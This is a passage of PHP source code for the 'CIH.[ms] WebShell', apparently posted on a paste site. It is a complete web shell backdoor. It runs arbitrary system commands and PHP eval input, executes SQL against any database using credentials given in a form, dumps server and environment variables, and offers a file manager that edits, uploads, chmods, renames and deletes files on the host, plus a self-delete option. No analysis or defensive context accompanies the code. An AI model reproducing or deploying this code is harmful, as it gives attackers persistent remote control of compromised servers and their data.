  452. if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname  = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '<div >';$sqlq =  $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db)
  453. {if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) {
  454. $number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;}
  455. echo "<div class='str' style='border-top:1px solid #333; '>query # <b>".$number."</b>:".htmlspecialchars($query)."</div>";
  456. if ($error){ notice("Error : <b>".$error."</b>"); }
  457. else {if(is_array($r)){echo '<table style="width:100%; background:#222;">';
  458. if(is_array($r[0])){echo "<tr style='background:#292929; font-size:10px;'>";foreach($r[0] as $n=>$v){echo "<td style='padding:5px;'><b>$n</b></td>";}echo '</tr>';}foreach($r as $a){echo "<tr style='background:#232323;'>";
  459. if(is_array($a)){foreach($a as $n=>$v){echo "<td class='my'>$v</td>";}}else{echo "<td class='file'>$a</td>";}echo '</tr>';}echo '</table>';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) {
  460. echo "<div class='str' style='margin-top:3px; border-bottom:1px solid #333; padding:3px;'>affected rows : <b>".$rows."</b></div>"; }
  461. }} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '</div>'; }
  462. echo "<form action='' method='post' style='margin:0px; margin-top:15px;'>
  463. <table style='width:100%; height:40%'><tr><td valign='top' style='background:#272727; padding:3px;'><textarea  class='txt' cols='70' rows='15' name='sql' style='width:100%; height:99%'>";
  464. if(isset($_POST['sql'])){echo $_POST['sql'];} else echo 'SHOW DATABASES;';
  465. echo "</textarea></td><td style='width:150px; background:#272727;' valign='top' >
  466. <input type='text' name='mysqlw_host' class='txt' style='margin:10px; height:24px;' value='$dbhost'/><input type='text' name='mysqlw_db'  class='txt' style='margin:10px; height:24px;'  value='$dbname'/><input type='text' name='mysqlw_login' class='txt' style='margin:10px; height:24px;'  value='$dblogin'/><input type='txt' name='mysqlw_passw'  class='txt' style='margin:10px; height:24px;'  value='$dbpass'/><input type='text' name='mysqlw_port'  class='txt' style='margin:10px; height:24px;'  value='$dbport'/><br/></td><tr><td colspan=2 valign='top' style='height:5%;'><input type='hidden' name='do' value='mysql'><input type='submit' class='txt' style='width:100%; margin:0px; margin-bottom:5px; ' value='go!'></td></tr></table></form><br/>";
  467. do_footer($ver);   die(); break;
  468. case 'server':
  469. echo '<table class="str" style="width:100%">';foreach($_SERVER as $k=>$v)
  470. {echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td>$v</td></tr>";}echo '</table>';do_footer($ver);
  471. die();break;
  472. case 'envinfo':
  473. echo '<table class="str" style=" width:100%">';foreach($_ENV as $k=>$v)
  474. {echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td style='padding:3px;'>$v</td></tr>";}echo '</table><br/>';do_footer($ver);die();break;
  475. case 'delete':
  476. if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "<div class='notice'>cihshell has been deleted successfully..bye-bye ): </div><br/><br/>"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break;
  477. case 'eval':
  478. echo "<form method='post' action='' style='padding:0px; margin-top:5px;'><input type='hidden' name='do' value='eval'  style='border-bottom:1px solid #444;'> <textarea  name='eval' class='form' style='height:100px;'>";
  479. if (isset($_POST['eval'])){echo $_POST['eval'];} else {echo 'code here (:';}
  480. echo "</textarea><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form><br/>";
  481. if (isset($_POST['eval'])){
  482. echo "<table  class='txt'  style='margin-left:13px; width:98%; height:60%'><tr><td valign='top'>";code_eval();echo "</td></tr></table><br/>";}
  483. do_footer($ver);die(); break;
  484. case 'shell':
  485. echo " <textarea class='txt'  style='width:98%; height:60%; background:#262626' rows='30'>";if($safe_mode == 'On'){ echo "Safe mode is on..";}if(isset($_POST['alias'])){ foreach ($alias as $k=>$v) { if ($_POST['alias'] == $k){cmd_exec($v);}}} else {cmd_exec($safe_mode);}if(isset($_POST['cmdir'])) {$dirr = $_POST['cmdir'];} else {$dirr = $path;}echo "</textarea>";echo "<form method='post' action='' style='padding:0px; margin-top:5px; margin-bottom:15px;'><input type='hidden' name='do' value='shell'><input type='text'  name='cmd' value='";if (isset($_POST['cmd'])){echo $_POST['cmd'];} elseif ($os == 'win'){echo 'dir';} else{echo 'ls';}echo "'  class='form' style='width:98%; margin-bottom:2px;'><input type='text'  name='cmdir' value='$dirr'  class='form' style='color:#444;width:98%'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form>";echo"<form method='post' action='' style='border-top:1px solid #282828; margin:0px;'><select name='alias' class='form' style='width:98%; margin-top:5px;'>";foreach($alias as $k=>$v){echo "<option>$k</option>";}echo "</select><input type='hidden' name='do' value='shell'><input type='hidden' name='cmdir' value='$dirr'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'</form><br/><br/>";do_footer($ver);   die();break;
  486. case 'cihshell':echo "<div class='str' style='text-align:center;'><table class='str' style='width:100%'><tr>
  487. <td style='border-right:1px solid #333; width:200px;'><div style=' padding:50px; margin-top:50px; margin-bottom:50px; border-top:1px solid #333; border-bottom:1px solid #333;'>Coded by <b>Berkut</b>. <br/><br/>&copy; 2007 <br/><hr>Fixed by <b>DCRM</b>. <br/></br>&copy; 2008 <br/></div></td><td valign='top' style='padding-left:30px;'><br/><br/><span style='font-size:20px; color:#666;'>CIH.[ms] WebShell<sup style='font-size:12px; color:#444;'>&nbsp;v.$ver</sup></span><br/><br/><br/>It has so many strong points that it is impossible to write them here (:</td></tr></table></div>";do_footer($ver); die();break;
  488. default: error('There is no such function',$ver);
  489. break;}}
  490.  # file actions
  491. if(is_file($path))
  492.   {$perms = fperms($path); $size = filesize($path."/".$file); $size = conv_size($size); $size_fix = conv_size(filesize($path));  $pp = $_POST['f_path'];$ppp = $_POST['f_file'];
  493. echo "<div  style='padding:2px;'><div style='background:#292929; padding:10px; margin-bottom:3px; text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px;  font-size:9px; text-align:left;'>file:&nbsp;<span style='color:#666;'>$path</span>&nbsp;&nbsp;|&nbsp;&nbsp; permissions: <b style='color:#666;'>$perms </b>&nbsp;&nbsp;|&nbsp;&nbsp; size: <span style='color:#666;'>$size_fix</span>&nbsp;&nbsp;|&nbsp;&nbsp; Create time: <span style='color:#666;'>".date("d.m.Y H:i:s",filectime($path))."</span>&nbsp;&nbsp;|&nbsp;&nbsp;Modify time: <span style='color:#666;'>".date("d.m.Y H:i:s",filemtime($path))."</span></div><table style='width:100%; font-size:10px;'><tr><td style='width:200px; border-right:1px solid #292929; vertical-align:top; padding:0px; padding-left:5px;'>      <form method='post' action=''><input type='hidden' name='ffile' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'>      <input type='submit' class='fa' name='fdo' value='view' style=''></div><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='view in HEX' style=''></div>       <div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929; text-align:center; margin-top:5px;'>      <input type='submit' class='fa' name='fdo' value='edit'></div>       <div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'>      <input type='submit' class='fa' name='fdo' value='preview' ></div><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='download'></div><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:40px;'><input type='submit' class='fa1' name='fdo' value='delete'></div><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'>      <input type='submit' class='fa1' name='fdo' value='copy' ></div><div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='rename' ></div> <div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='chmod' ></div> <div style='width:200px; border-top:1px solid #292929;  border-bottom:1px solid #292929;  text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='touch' ></div></td><td style='padding:3px; vertical-align:top;'>";
  494.  if (isset($_POST['fdo']) && isset($_POST['ffile'])){
  495. $ffile = $_POST['ffile'];
  496. switch($_POST['fdo']){
  497. case 'view':
  498. fileread2($ffile, $stringnum);
  499. break;
  500. case 'view in HEX':
  501.  
  502. $fi=fopen($path,"rb");
  503. if ($fi) {$str = fread($fi,filesize($path));$n=0;$a0="00000000<br/>";$a1="";$a2="";
  504. for ($i=0; $i<strlen($str); $i++) {$a1.=sprintf("%02X",ord($str[$i])).' ';switch (ord($str[$i])) {case 0:  $a2.="0"; break;case 32: case 10:case 13: $a2.="&nbsp;"; break;default:  $a2.=htmlspecialchars($str[$i]);}$n++;if ($n==$hexdump_rows) {$n=0;if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";$a1.="<br>";$a2.="<br>";}}echo "<table style='font-size:10px;'><tr><td style='border-right:1px solid #292929; color:#444; padding:4px;'>$a0</td><td style='color:#666; padding:4px;'>$a1</td><td style='border-left:1px solid #292929; color:#444; padding:4px;'>$a2</td></tr>";echo"</table>";
  505. }break;
  506. case 'edit':
  507. echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:100%;' name='wrcont'> ";
  508. fileread($ffile);echo "</textarea><input type='hidden' name='ffile' value='$ffile'><input type='hidden' name='path' value='".$path."'><input type='submit' name='wrfile' class='form' value='save file' style='width:100%; margin-top:5px;'></form><br/>"; break;
  509. case 'chmod':
  510. echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='chmod' class='form'  value='".substr(sprintf('%o', fileperms($path)), -4)."' style='width:10%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form'  value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
  511.  
  512. case 'touch':
  513. echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='touch' class='form'  value='".date("d M Y H:i:s",filemtime($path))."' style='width:15%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form'  value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
  514.  
  515. case 'rename':
  516. echo" <form method='post' action=''  style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form'  value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form'  value='".$path."'  style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>";break;
  517. case 'copy':
  518. echo"<form method='post' action=''  style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form'  value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newpath' class='form'  value='".$path."'  style='width:40%'><input type='submit' style='width:60px;' class='form' value='copy!'></form><br/>";break; }}
  519. else {
  520. $fh = fopen($path, 'r'); if (!$fh){error('Could not open file',$ver);}echo '<table style="font-size:10px;   width:100%; background:#222; ">';if ($stringnum){$i=1;while(!feof($fh) & $i<=30) {$line = fgets($fh);  echo '<tr style="background:#242424;"><td style="text-align:center;padding:3px; width:2%; border-right:1px solid #2e2e2e; color:#444;">'.$i.'</td><td>'.htmlspecialchars($line).'</td></tr>'; $i++;}}else {while(!feof($fh) & $i<=30) {$line = fgets($fh);  echo '<tr style="background:#242424;"><td>'.htmlspecialchars($line).'</td></tr>'; }}echo '</table>';}
  521. echo '</td></tr></table></div>';do_footer($ver);die();}
  522. elseif (is_dir($path))
  523.  {
  524.   $dirs=array();
  525.   $files=array();
  526.   $dir=opendir($path);
  527.   while (($file=readdir($dir))!==false) { if ($file=="." || $file=="..") continue;
  528.          if (is_dir("$path/$file"))  {$dirs[]=$file;}
  529.          else {$files[]=$file;}}closedir($dir);
  530.   }
  531.  
  532. else {error('it isn\'t a directory', $ver);}
  533. if (!$dir){error('An error occured while opening directory&nbsp;'.$path, $ver);}
  534. sort($dirs);
  535. sort($files);
  536. echo "<table style='width:100%; background:#222;'>";
  537.    echo "<tr><td colspan=6 class='filet' style='background:#282828; padding:0px; border-top:1px solid #2e2e2e; height:30px;'>";
  538. # drives
  539.    if ($os == "win") {
  540.     echo "<form method='post' action='' style='padding:0px; margin:0px; float:left;'>";echo "<input type='button' value='Drives:' class='fm' style='font-weight:bold;'>";for($d='c';$d<='z';$d++){if(is_dir($d.":/"))echo "<input type='submit' value='".$d.":/' class='fm' name='path'>";  }echo "</form>";}echo "<form method='post' action='' style='padding:0px; margin:0px; float:right;' >";
  541. echo "<input type='submit' name='diract' class='fm' value='directory actions' style='margin-bottom:0px; font-weight:bold; color:#666;'><input type='hidden' name='curdir' value='$path'><input type='hidden' name='cmdir' value='$path'><span style='color:#666;'>|</span><input type='submit' name='fileact'   value='New File' class='fm'><span style='color:#666;'>|</span><input type='submit'  style='margin:0px;' name='fileact' value='New Dir' class='fm'><span style='color:#666;'>|</span><input type='submit' name='fileact' value='Upload' class='fm'>";echo "</form>";
  542. echo "</td></tr>";echo "<tr style='background:#272727;'><td  style='width:3%; '>&nbsp;</td><td style='width:300px; color:#888;' class='filet'><b>name</b></td><td class='filet' style='color:#888;'><b>size</b></td><td class='filet' style='color:#888;'><b>last modified</b></td><td class='filet' style='color:#888;'><b>permissions</b></td></tr>";echo "<form method='post' action=''><input type='hidden' name='f_path' value='$path'>";
  543. for ($i=0; $i<count($dirs); $i++) {
  544. $size = '---';
  545. $perms = fperms($path."/".$dirs[$i]);
  546. $ico = '<b>dir</b>';
  547. $last_mod = date('d.m.y  H:i:s', fileatime($path."/".$file));if(!$last_mod){$last_mod = "---";}
  548. echo" <tr style='background:#252525;'><td  class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file' class='dir' value='$dirs[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";}
  549.  
  550.  for ($i=0; $i<count($files); $i++) {
  551. # filesize
  552. if (is_link($path."/".$files[$i])) {$size = "---";} else {$size = filesize($path."/".$files[$i]); $size = conv_size($size);  if($size == '0B'){$size = '---';} }
  553. # date
  554. $last_mod = date('d.m.y  H:i:s', fileatime($path."/".$files[$i]));if(!$last_mod){$last_mod = "---";}
  555. #perms
  556. $perms = fperms($path."/".$files[$i]);
  557. #filetype (ico)
  558. $ico = ''; if(is_link($path."/".$files[$i])) {$ico = 'link';}
  559. else{
  560. // filetypes for file manager
  561. $filetypes  = array(
  562. "php"=> array("php","phtml","php3","php4","inc"),
  563. "exe"=>array("sh","install","bat","cmd"),
  564. "ini"=>array("ini","inf"),
  565. "html"=>array("html","htm","shtml"),
  566. "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
  567. "code"=>array("tcl","h","c","cpp", "pl", "cgi"),
  568. "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  569. "sdb"=>array("sdb"),
  570. "sess"=>array("sess"),
  571. "dwnld"=>array("exe","com","pif","src","lnk","zip","rar")
  572. );
  573. $filename = $files[$i]; $ext = explode(".",$filename);$c = count($ext)-1;$ext = $ext[$c];$ext = strtolower($ext);$rft = "";foreach($filetypes as $key=>$value){if (in_array($ext,$value)) {$ico = $key; break;} } if($ico==''){$ico = 'none';}}
  574. $wtf = '/'.$files[$i];if ($wtf == $_SERVER['SCRIPT_NAME']) {echo"<tr style='background:#292929;'><td  class='ico' style='color:#666;'>[shell]</td><td style='width:300px;'><input type='submit' style='background:#292929;' name='f_file' class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";}
  575. else {
  576. echo"<tr style='background:#252525;'><td  class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file'  class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";        }
  577. }echo '</form></table><div style="padding-left:2px; padding-right:2px; padding-bottom:4px; background:#222;"><div class="filet" style="background:#272727; border-bottom:1px solid #2e2e2e">&nbsp</div></div>';do_footer($ver);}
  578. else {echo ' <html><head><style>body{background:#333;}</style><title>login </title></head><body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:"><tr><td><form method="post" style="margin:0px; padding:)px;">login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">&nbsp;password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;">&nbsp;<input type="submit"  style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr></table></body></html>';}
  579. ?>
Add Comment
Please, Sign In to add comment